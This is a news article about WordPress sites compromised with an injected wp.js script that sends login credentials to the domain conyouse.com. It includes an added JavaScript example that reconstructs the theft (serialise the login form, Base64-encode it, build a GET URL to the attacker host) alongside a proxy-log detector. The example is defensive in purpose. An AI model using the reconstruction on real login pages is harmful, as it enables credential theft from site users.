

Small WordPress sites leaking like sieves

Login-stealing C&C server spotted

WordPress admins hoping for some feet-up time after last week's Twenty Fifteen XSS vulnerability appear to have yet another problem to handle.

Researchers at Zscaler have identified a batch of compromised WordPress sites that are all leaking user credentials to the same destination: conyouse.com, which hosts the command and control.

The researchers haven't yet identified which vulnerability is being used to break into the WordPress sites under attack. Most of the domains in their list look to El Reg like they're run by individuals or small community groups (for example, if you know someone involved with the Blissfields Festival, or in the Glasgow Contemporary Choir, tell them they need to patch), so they may not have the world's most vigilant webmasters.

Zscaler's blog post notes: “The compromised sites run backdoor code, which activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. Till now, we have identified only one domain "conyouse.com" which is collecting all the credentials from these compromised sites.”

The compromised sites serve up login pages with JavaScript injected to do the credential stealing. The code lives in a file named wp.js, and Zscaler's post includes a grab of the obfuscated JavaScript it contains.

Zscaler's grab of the malicious login script (part of the attack caught by Zscaler)

Zscaler continues: “The form containing the username and password input box has a fixed name as ‘loginform‘ in all WordPress sites.

“The preventDefault event method is used to cancel the submit event for 'loginform' entity and execute the alternate code which is present in this file. The login credential string is serialised and encoded in a Base64 format.”
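To make the flow Zscaler describes concrete, and to give a defender something to run, here is an added example (not the obfuscated wp.js from the compromised sites, and not Zscaler's code). The first half reconstructs the theft as described: the WordPress login form's fields are serialised the way jQuery's .serialize() would, Base64-encoded, and sent as a GET to the attacker's host. The second half is a check over proxy log lines that decodes any Base64 query value on a request to a watchlisted host and flags it when it contains WordPress's login field names. Assumptions: the query-parameter name `data`, the "<timestamp> <client> GET <url>" log format, and the sample log lines are all constructed for this example; the one domain on the watchlist, conyouse.com, is the C&C domain named in the article.

```javascript
// Added example: reconstruction of the credential-theft flow described by
// Zscaler (serialise #loginform, Base64-encode, GET to the attacker's host)
// plus a proxy-log check for that traffic. Not the original wp.js.

const WATCHLIST = new Set(['conyouse.com']); // the C&C domain named in the article

// WordPress core names its wp-login.php inputs `log` (username) and `pwd` (password).
const WP_LOGIN_FIELDS = ['log', 'pwd'];

// Attacker side, as described: serialise the form fields (key=value&...) then
// Base64-encode the resulting string.
function encodeLoginForm(fields) {
  const serialised = new URLSearchParams(fields).toString();
  return Buffer.from(serialised, 'utf8').toString('base64');
}

// The query-parameter name (`data`) is an assumption; the article does not give it.
function buildExfilUrl(host, encoded, param = 'data') {
  return `http://${host}/?${param}=${encodeURIComponent(encoded)}`;
}

// Defender side: turn a suspected payload back into its fields.
// Returns null unless the value is Base64 that decodes to a printable query string.
function decodeExfilPayload(value) {
  if (!/^[A-Za-z0-9+/]+=*$/.test(value) || value.length % 4 !== 0) return null;
  const text = Buffer.from(value, 'base64').toString('utf8');
  if (!/^[\x20-\x7e]+$/.test(text) || !text.includes('=')) return null;
  return Object.fromEntries(new URLSearchParams(text));
}

// Scan proxy log lines of the (constructed) form "<ts> <client> GET <url>".
// A hit is a GET to a watchlisted host whose query carries a Base64 blob that
// decodes to the WordPress login fields. Pass watchlist = null to check every host.
function scanProxyLog(lines, watchlist = WATCHLIST) {
  const findings = [];
  for (const line of lines) {
    const m = line.match(/^(\S+) (\S+) GET (\S+)/);
    if (!m) continue;
    let url;
    try { url = new URL(m[3]); } catch { continue; }
    if (watchlist && !watchlist.has(url.hostname)) continue;
    for (const [param, value] of url.searchParams) {
      const fields = decodeExfilPayload(value);
      if (!fields) continue;
      if (WP_LOGIN_FIELDS.every((f) => f in fields)) {
        findings.push({ time: m[1], client: m[2], host: url.hostname, param, user: fields.log });
      }
    }
  }
  return findings;
}

// Constructed sample log: one benign request to the site's own login page,
// then the exfiltration GET the injected script would make after the user
// submits the form. The credentials are made up.
const SAMPLE_LOG = [
  '2015-05-12T10:01:02Z 10.0.0.5 GET http://example.com/wp-login.php',
  `2015-05-12T10:01:03Z 10.0.0.5 GET ${buildExfilUrl('conyouse.com',
    encodeLoginForm({ log: 'admin', pwd: 'hunter2', rememberme: 'forever' }))}`,
];

const FINDINGS = scanProxyLog(SAMPLE_LOG);
console.log(FINDINGS);
```

The check keys on the decoded field names rather than on the attacker's parameter name, so it is not thrown off by a renamed parameter; running it with `watchlist = null` catches the same payload shape sent to a host that has not yet been attributed, at the cost of decoding every Base64-looking query value in the log.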

Get patching. ®
